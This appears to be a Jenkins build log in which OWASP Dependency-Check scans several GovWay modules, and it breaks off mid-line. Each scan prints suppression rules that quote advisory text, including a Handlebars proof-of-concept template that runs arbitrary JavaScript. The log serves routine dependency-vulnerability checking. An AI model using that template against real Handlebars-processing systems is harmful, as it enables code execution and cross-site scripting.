--- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.jackson --- 17:40:46 [INFO] Checking for updates 17:40:46 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:40:46 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:40:46 [INFO] Check for updates complete (70 ms) 17:40:46 [INFO] 17:40:46 17:40:46 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:40:46 17:40:46 17:40:46 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:40:46 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:40:46 17:40:46 17:40:46 [INFO] Analysis Started 17:40:46 [INFO] Finished Archive Analyzer (0 seconds) 17:40:46 [INFO] Finished File Name Analyzer (0 seconds) 17:40:46 [INFO] Finished Jar Analyzer (0 seconds) 17:40:46 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:40:46 [INFO] Finished Hint Analyzer (0 seconds) 17:40:46 [INFO] Finished Version Filter Analyzer (0 seconds) 17:40:47 [INFO] Created CPE Index (1 seconds) 17:40:48 [INFO] Finished CPE Analyzer (1 seconds) 17:40:48 [INFO] Finished False Positive Analyzer (0 seconds) 17:40:48 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:40:48 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:40:48 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:40:48 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:40:48 17:40:48 17:40:48 ## Recommendation 17:40:48 17:40:48 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:40:48 17:40:48 The following template can be used to demonstrate the vulnerability: 17:40:48 ```{{#with "constructor"}} 17:40:48 {{#with split as |a|}} 17:40:48 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:40:48 {{#with (concat (lookup join (slice 0 1)))}} 17:40:48 {{#each (slice 2 3)}} 17:40:48 {{#with (apply 0 a)}} 17:40:48 {{.}} 17:40:48 {{/with}} 17:40:48 {{/each}} 17:40:48 {{/with}} 17:40:48 {{/with}} 17:40:48 {{/with}}``` 17:40:48 17:40:48 17:40:48 ## Recommendation 17:40:48 17:40:48 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:40:48 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:40:48 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:40:48 [INFO] Analysis Complete (1 seconds) 17:40:48 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:40:48 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:40:48 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:40:48 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:40:48 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:40:48 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:40:48 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:40:48 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:40:48 [INFO] 17:40:48 [INFO] --------------< org.openspcoop2:org.openspcoop2.jakarta >--------------- 17:40:48 [INFO] Building dependencies.jakarta 1.0 [13/67] 17:40:48 [INFO] from mvn/dependencies/jakarta/pom.xml 17:40:48 [INFO] --------------------------------[ pom ]--------------------------------- 17:40:48 [INFO] 17:40:48 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jakarta --- 17:40:48 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jakarta (includes = [*.jar], excludes = []) 17:40:48 [INFO] 17:40:48 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jakarta --- 17:40:48 [INFO] 17:40:48 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.jakarta --- 17:40:48 [INFO] Executing tasks 17:40:53 [INFO] Executed tasks 17:40:53 [INFO] 17:40:53 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.jakarta --- 17:40:53 [INFO] Checking for updates 17:40:53 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:40:53 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:40:53 [INFO] Check for updates complete (71 ms) 17:40:53 [INFO] 17:40:53 17:40:53 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:40:53 17:40:53 17:40:53 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:40:53 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:40:53 17:40:53 17:40:53 [INFO] Analysis Started 17:40:53 [INFO] Finished Archive Analyzer (0 seconds) 17:40:53 [INFO] Finished File Name Analyzer (0 seconds) 17:40:53 [INFO] Finished Jar Analyzer (0 seconds) 17:40:53 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:40:53 [INFO] Finished Hint Analyzer (0 seconds) 17:40:53 [INFO] Finished Version Filter Analyzer (0 seconds) 17:40:55 [INFO] Created CPE Index (1 seconds) 17:40:55 [INFO] Finished CPE Analyzer (1 seconds) 17:40:55 [INFO] Finished False Positive Analyzer (0 seconds) 17:40:55 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:40:55 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:40:55 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:40:55 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:40:55 17:40:55 17:40:55 ## Recommendation 17:40:55 17:40:55 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:40:55 17:40:55 The following template can be used to demonstrate the vulnerability: 17:40:55 ```{{#with "constructor"}} 17:40:55 {{#with split as |a|}} 17:40:55 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:40:55 {{#with (concat (lookup join (slice 0 1)))}} 17:40:55 {{#each (slice 2 3)}} 17:40:55 {{#with (apply 0 a)}} 17:40:55 {{.}} 17:40:55 {{/with}} 17:40:55 {{/each}} 17:40:55 {{/with}} 17:40:55 {{/with}} 17:40:55 {{/with}}``` 17:40:55 17:40:55 17:40:55 ## Recommendation 17:40:55 17:40:55 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:40:55 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:40:55 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:40:55 [INFO] Analysis Complete (1 seconds) 17:40:55 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:40:55 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:40:55 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:40:55 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:40:55 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:40:55 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:40:55 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:40:55 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:40:55 [INFO] 17:40:55 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jaxb >---------------- 17:40:55 [INFO] Building dependencies.jaxb 1.0 [14/67] 17:40:55 [INFO] from mvn/dependencies/jaxb/pom.xml 17:40:55 [INFO] --------------------------------[ pom ]--------------------------------- 17:40:55 [INFO] 17:40:55 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jaxb --- 17:40:55 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jaxb (includes = [*.jar], excludes = []) 17:40:55 [INFO] 17:40:55 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jaxb --- 17:40:55 [INFO] 17:40:55 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.jaxb --- 17:40:55 [INFO] Executing tasks 17:41:00 [INFO] Executed tasks 17:41:00 [INFO] 17:41:00 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.jaxb --- 17:41:00 [INFO] Checking for updates 17:41:00 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:00 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:00 [INFO] Check for updates complete (76 ms) 17:41:01 [INFO] 17:41:01 17:41:01 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:01 17:41:01 17:41:01 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:01 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:01 17:41:01 17:41:01 [INFO] Analysis Started 17:41:01 [INFO] Finished Archive Analyzer (0 seconds) 17:41:01 [INFO] Finished File Name Analyzer (0 seconds) 17:41:01 [INFO] Finished Jar Analyzer (0 seconds) 17:41:01 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:01 [INFO] Finished Hint Analyzer (0 seconds) 17:41:01 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:02 [INFO] Created CPE Index (1 seconds) 17:41:02 [INFO] Finished CPE Analyzer (1 seconds) 17:41:02 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:02 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:02 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:02 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:02 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:02 17:41:02 17:41:02 ## Recommendation 17:41:02 17:41:02 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:02 17:41:02 The following template can be used to demonstrate the vulnerability: 17:41:02 ```{{#with "constructor"}} 17:41:02 {{#with split as |a|}} 17:41:02 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:02 {{#with (concat (lookup join (slice 0 1)))}} 17:41:02 {{#each (slice 2 3)}} 17:41:02 {{#with (apply 0 a)}} 17:41:02 {{.}} 17:41:02 {{/with}} 17:41:02 {{/each}} 17:41:02 {{/with}} 17:41:02 {{/with}} 17:41:02 {{/with}}``` 17:41:02 17:41:02 17:41:02 ## Recommendation 17:41:02 17:41:02 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, 